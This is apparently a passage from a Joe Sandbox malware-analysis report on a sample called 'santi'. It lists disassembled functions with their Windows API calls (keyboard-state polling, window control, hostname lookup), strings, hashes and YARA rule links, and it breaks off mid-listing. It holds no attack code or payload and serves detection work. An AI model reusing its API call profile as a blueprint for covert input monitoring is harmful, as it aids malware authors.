                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: SendString
                                                                • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                • API String ID: 890592661-1007645807
                                                                • Opcode ID: c64795dd71f5889248c31e2b3f207ea340f440c658a54bfa7c382684de41c1a3
                                                                • Instruction ID: 60c010609c31f913cde39a5406043b1159015f3f239693eb806064691fa9bea9
                                                                • Opcode Fuzzy Hash: c64795dd71f5889248c31e2b3f207ea340f440c658a54bfa7c382684de41c1a3
                                                                • Instruction Fuzzy Hash: 4611C8F1AA01A979DB21B7A6DC4ADFFBA7CEB91B00F400419B411A60C1DAB00E45CAB0
                                                                Function 0032778F Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • timeGetTime.WINMM ref: 00327794
                                                                  • Part of subcall function 002FDC38: timeGetTime.WINMM(?,75A4B400,003558AB), ref: 002FDC3C
                                                                • Sleep.KERNEL32(0000000A), ref: 003277C0
                                                                • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 003277E4
                                                                • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00327806
                                                                • SetActiveWindow.USER32 ref: 00327825
                                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00327833
                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 00327852
                                                                • Sleep.KERNEL32(000000FA), ref: 0032785D
                                                                • IsWindow.USER32 ref: 00327869
                                                                • EndDialog.USER32(00000000), ref: 0032787A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                • String ID: BUTTON
                                                                • API String ID: 1194449130-3405671355
                                                                • Opcode ID: c84fefa1f651b41ad1a2a84f2d24a99d910eba30c9e274cf875c6ca94dc348a9
                                                                • Instruction ID: bdc2a8170bbba6eebfd0c112b6e579e7500c4f0cac40d116fed239f819e0939b
                                                                • Opcode Fuzzy Hash: c84fefa1f651b41ad1a2a84f2d24a99d910eba30c9e274cf875c6ca94dc348a9
                                                                • Instruction Fuzzy Hash: 7C2138B4608219AFEB035B25FC8EB667F6DFB46348F058124F547865A2CBB29D10DB21
                                                                Function 003302EE Relevance: 18.3, APIs: 12, Instructions: 282comCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002E936C: __swprintf.LIBCMT ref: 002E93AB
                                                                  • Part of subcall function 002E936C: __itow.LIBCMT ref: 002E93DF
                                                                • CoInitialize.OLE32(00000000), ref: 0033034B
                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 003303DE
                                                                • SHGetDesktopFolder.SHELL32(?), ref: 003303F2
                                                                • CoCreateInstance.OLE32(0036DA8C,00000000,00000001,00393CF8,?), ref: 0033043E
                                                                • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 003304AD
                                                                • CoTaskMemFree.OLE32(?,?), ref: 00330505
                                                                • _memset.LIBCMT ref: 00330542
                                                                • SHBrowseForFolderW.SHELL32(?), ref: 0033057E
                                                                • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 003305A1
                                                                • CoTaskMemFree.OLE32(00000000), ref: 003305A8
                                                                • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 003305DF
                                                                • CoUninitialize.OLE32(00000001,00000000), ref: 003305E1
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                • String ID:
                                                                • API String ID: 1246142700-0
                                                                • Opcode ID: e4967d4462fdb8a5c4e6077585f07b30649479ab625d224f26df7702d4f2a26f
                                                                • Instruction ID: 805e9b79cfeb853c389ca433010342947972b13bec9ae44b8ce8060abdaf5815
                                                                • Opcode Fuzzy Hash: e4967d4462fdb8a5c4e6077585f07b30649479ab625d224f26df7702d4f2a26f
                                                                • Instruction Fuzzy Hash: 63B1E774A00208AFDB05DFA5C898DAEBBB9FF48304F1484A9E906EB251DB70ED41CF50
                                                                Function 00322E5B Relevance: 18.2, APIs: 12, Instructions: 185keyboardCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetKeyboardState.USER32(?), ref: 00322ED6
                                                                • SetKeyboardState.USER32(?), ref: 00322F41
                                                                • GetAsyncKeyState.USER32(000000A0), ref: 00322F61
                                                                • GetKeyState.USER32(000000A0), ref: 00322F78
                                                                • GetAsyncKeyState.USER32(000000A1), ref: 00322FA7
                                                                • GetKeyState.USER32(000000A1), ref: 00322FB8
                                                                • GetAsyncKeyState.USER32(00000011), ref: 00322FE4
                                                                • GetKeyState.USER32(00000011), ref: 00322FF2
                                                                • GetAsyncKeyState.USER32(00000012), ref: 0032301B
                                                                • GetKeyState.USER32(00000012), ref: 00323029
                                                                • GetAsyncKeyState.USER32(0000005B), ref: 00323052
                                                                • GetKeyState.USER32(0000005B), ref: 00323060
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: State$Async$Keyboard
                                                                • String ID:
                                                                • API String ID: 541375521-0
                                                                • Opcode ID: 1d5581f3a0939e2fc51ea5f714b2399da1b9d1de0a53b995d5a406688bb777e3
                                                                • Instruction ID: 1568ef1961e4c2ae0bc20be908ad4742bc74ea9034b717edd428c800273df005
                                                                • Opcode Fuzzy Hash: 1d5581f3a0939e2fc51ea5f714b2399da1b9d1de0a53b995d5a406688bb777e3
                                                                • Instruction Fuzzy Hash: 2951D870A047A439FB37DBA4A9107EBBBB45F11340F0A859DD5C25A1C2DA949B4CCBA2
                                                                Function 0031ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDlgItem.USER32(?,00000001), ref: 0031ED1E
                                                                • GetWindowRect.USER32(00000000,?), ref: 0031ED30
                                                                • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0031ED8E
                                                                • GetDlgItem.USER32(?,00000002), ref: 0031ED99
                                                                • GetWindowRect.USER32(00000000,?), ref: 0031EDAB
                                                                • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0031EE01
                                                                • GetDlgItem.USER32(?,000003E9), ref: 0031EE0F
                                                                • GetWindowRect.USER32(00000000,?), ref: 0031EE20
                                                                • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0031EE63
                                                                • GetDlgItem.USER32(?,000003EA), ref: 0031EE71
                                                                • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0031EE8E
                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 0031EE9B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$ItemMoveRect$Invalidate
                                                                • String ID:
                                                                • API String ID: 3096461208-0
                                                                • Opcode ID: ccdeb124d3a9b6834cc9ad84b0e54b6165ca30b6a4f600bce4d65797acd1b9ca
                                                                • Instruction ID: 02c57a1c7759299c47e4b11bcef25dbad4449517b9f34b372df52d303927c6f8
                                                                • Opcode Fuzzy Hash: ccdeb124d3a9b6834cc9ad84b0e54b6165ca30b6a4f600bce4d65797acd1b9ca
                                                                • Instruction Fuzzy Hash: C2513471B00205AFDF19CF69DD89AAEBBBAFB88700F55812DF919D7290D7B19D408B10
                                                                Function 002FB73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002FB759,?,00000000,?,?,?,?,002FB72B,00000000,?), ref: 002FBA58
                                                                • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,002FB72B), ref: 002FB7F6
                                                                • KillTimer.USER32(00000000,?,00000000,?,?,?,?,002FB72B,00000000,?,?,002FB2EF,?,?), ref: 002FB88D
                                                                • DestroyAcceleratorTable.USER32(00000000), ref: 0035D8A6
                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002FB72B,00000000,?,?,002FB2EF,?,?), ref: 0035D8D7
                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002FB72B,00000000,?,?,002FB2EF,?,?), ref: 0035D8EE
                                                                • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002FB72B,00000000,?,?,002FB2EF,?,?), ref: 0035D90A
                                                                • DeleteObject.GDI32(00000000), ref: 0035D91C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                • String ID:
                                                                • API String ID: 641708696-0
                                                                • Opcode ID: 45bd65b3596c727c6e510f6d11b18c9ddd026673eb082d467f1d16102ab40787
                                                                • Instruction ID: decae0c99e64925a5d55b95d5f477440d86a38adefdd70f7fd3f355bf63cd5e1
                                                                • Opcode Fuzzy Hash: 45bd65b3596c727c6e510f6d11b18c9ddd026673eb082d467f1d16102ab40787
                                                                • Instruction Fuzzy Hash: 65619A31920605CFDB379F14D988B35F7B9FB95392F154129EA428AA70C7B0A8A4DF80
                                                                Function 002FB40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 002FB526: GetWindowLongW.USER32(?,000000EB), ref: 002FB537
                                                                • GetSysColor.USER32(0000000F), ref: 002FB438
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ColorLongWindow
                                                                • String ID:
                                                                • API String ID: 259745315-0
                                                                • Opcode ID: b83021e62c286b2bea28a3534e3dd58dbedbcd27dd11b8ebf1736d70d72ab3aa
                                                                • Instruction ID: 8422ac9de5f398de337c6ecf1180cf2e61429d8df29d9144438380b2f0f1c350
                                                                • Opcode Fuzzy Hash: b83021e62c286b2bea28a3534e3dd58dbedbcd27dd11b8ebf1736d70d72ab3aa
                                                                • Instruction Fuzzy Hash: 1E41C130510148AFDF235F28DD99FB97B6AAB06771F188261FE658A1E2C7B08C51CB21
                                                                Function 0032690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                • String ID:
                                                                • API String ID: 136442275-0
                                                                • Opcode ID: c1141e86166efc23b02af0a1b2a28bbd95baba8554c5fc25b8e6ad2b7dd5471d
                                                                • Instruction ID: fb17820fb85a73430ff8084b8806bb03c2d8575474f38b39d1ce14cb6c3e2426
                                                                • Opcode Fuzzy Hash: c1141e86166efc23b02af0a1b2a28bbd95baba8554c5fc25b8e6ad2b7dd5471d
                                                                • Instruction Fuzzy Hash: 3E411CB684612CAEDF66DB90DC56DDF73BCAF44300F0041A6B659A6091EA30ABE48F50
                                                                Function 0032D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CharLowerBuffW.USER32(0037DC00,0037DC00,0037DC00), ref: 0032D7CE
                                                                • GetDriveTypeW.KERNEL32(?,00393A70,00000061), ref: 0032D898
                                                                • _wcscpy.LIBCMT ref: 0032D8C2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                • API String ID: 2820617543-1000479233
                                                                • Opcode ID: b0cfe4d52c7e6f8a5bd8853ededd1ca9354123aa69f12d2747ef01f35612a069
                                                                • Instruction ID: 8cb6e9ee2a3fd3a97dbf77720d52781de4efba166d155a64f4b8630da2e18463
                                                                • Opcode Fuzzy Hash: b0cfe4d52c7e6f8a5bd8853ededd1ca9354123aa69f12d2747ef01f35612a069
                                                                • Instruction Fuzzy Hash: BE510434114344AFC702EF14E881AAFB3A5EF80714F61882EF59A572A2DB31DD15CF42
                                                                Function 002E936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __swprintf.LIBCMT ref: 002E93AB
                                                                • __itow.LIBCMT ref: 002E93DF
                                                                  • Part of subcall function 00301557: _xtow@16.LIBCMT ref: 00301578
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __itow__swprintf_xtow@16
                                                                • String ID: %.15g$0x%p$False$True
                                                                • API String ID: 1502193981-2263619337
                                                                • Opcode ID: 385b2f58458763fceeb6253f22d3019934f7ac0c571f6d1f71bfe7bdf3b949b1
                                                                • Instruction ID: 27f8731bea08c32e4a8e22d70fc1822c975a0fab48674d99f5a03a0ddd3dab3b
                                                                • Opcode Fuzzy Hash: 385b2f58458763fceeb6253f22d3019934f7ac0c571f6d1f71bfe7bdf3b949b1
                                                                • Instruction Fuzzy Hash: 12413671524204ABDB29EF75D941E6AB3E8EF88304F2044AFE549C72D1EA71D995CB10
                                                                Function 0034A1B6 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0034A259
                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0034A260
                                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0034A273
                                                                • SelectObject.GDI32(00000000,00000000), ref: 0034A27B
                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0034A286
                                                                • DeleteDC.GDI32(00000000), ref: 0034A28F
                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0034A299
                                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0034A2AD
                                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0034A2B9
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                • String ID: static
                                                                • API String ID: 2559357485-2160076837
                                                                • Opcode ID: b669c28eee878409756d35042fefadbeb77024dee9237a1b69d291545c7b3bc8
                                                                • Instruction ID: 9c19238c4e5141dac14230aa49d8316c6e446d36c0b88837a2c4e77ccfab25ba
                                                                • Opcode Fuzzy Hash: b669c28eee878409756d35042fefadbeb77024dee9237a1b69d291545c7b3bc8
                                                                • Instruction Fuzzy Hash: 23318E31640115ABDF125FA4DC49FEA3BADFF0E360F114214FA19AA0A0C7B5E811DB64
                                                                Function 00326F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                • String ID: 0.0.0.0
                                                                • API String ID: 2620052-3771769585
                                                                • Opcode ID: 0d3683306b70cae18226f28c46b0863a88dc7c545bd3a64410cd9e2cbe8cdeb1
                                                                • Instruction ID: bbd6102150d8f7314b0020f1ffdab3a798c27b01e723906afa9e4e11005d7143
                                                                • Opcode Fuzzy Hash: 0d3683306b70cae18226f28c46b0863a88dc7c545bd3a64410cd9e2cbe8cdeb1
                                                                • Instruction Fuzzy Hash: CA11E771A04129BBCF27AB70BD4AEDA77ACEF40710F014065F115A6091EFB49A818B61
                                                                Function 0030500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 00305047
                                                                  • Part of subcall function 00307C0E: __getptd_noexit.LIBCMT ref: 00307C0E
                                                                • __gmtime64_s.LIBCMT ref: 003050E0
                                                                • __gmtime64_s.LIBCMT ref: 00305116
                                                                • __gmtime64_s.LIBCMT ref: 00305133
                                                                • __allrem.LIBCMT ref: 00305189
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003051A5
                                                                • __allrem.LIBCMT ref: 003051BC
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003051DA
                                                                • __allrem.LIBCMT ref: 003051F1
                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0030520F
                                                                • __invoke_watson.LIBCMT ref: 00305280
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                • String ID:
                                                                • API String ID: 384356119-0
                                                                • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                • Instruction ID: cc717eddaef0f47af9f63ec15f162be888c9daa89f06c3a4805271c5ac65ba06
                                                                • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                • Instruction Fuzzy Hash: F671F971A02B16ABDB16AE78CC61B9F73ACBF14364F154529F510DA6C1E770D9408FD0
                                                                Function 00324DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 00324DF8
                                                                • GetMenuItemInfoW.USER32(003A1708,000000FF,00000000,00000030), ref: 00324E59
                                                                • SetMenuItemInfoW.USER32(003A1708,00000004,00000000,00000030), ref: 00324E8F
                                                                • Sleep.KERNEL32(000001F4), ref: 00324EA1
                                                                • GetMenuItemCount.USER32(?), ref: 00324EE5
                                                                • GetMenuItemID.USER32(?,00000000), ref: 00324F01
                                                                • GetMenuItemID.USER32(?,-00000001), ref: 00324F2B
                                                                • GetMenuItemID.USER32(?,?), ref: 00324F70
                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00324FB6
                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00324FCA
                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00324FEB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                • String ID:
                                                                • API String ID: 4176008265-0
                                                                • Opcode ID: 9017dfc042d424a69fc05e15d154c82a77dfa4b44ca3c5f8b56ad8dad2ae3d26
                                                                • Instruction ID: 22915f2201e438325ff6d46df9b7a019f8eff1a5be1e57603c61608e7ba90bb0
                                                                • Opcode Fuzzy Hash: 9017dfc042d424a69fc05e15d154c82a77dfa4b44ca3c5f8b56ad8dad2ae3d26
                                                                • Instruction Fuzzy Hash: C561A271A00269AFDB13CFA4E988AAE7BBCFB45304F154059F542A7291D771AD05CB21
                                                                Function 00349C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00349C98
                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00349C9B
                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00349CBF
                                                                • _memset.LIBCMT ref: 00349CD0
                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00349CE2
                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00349D5A
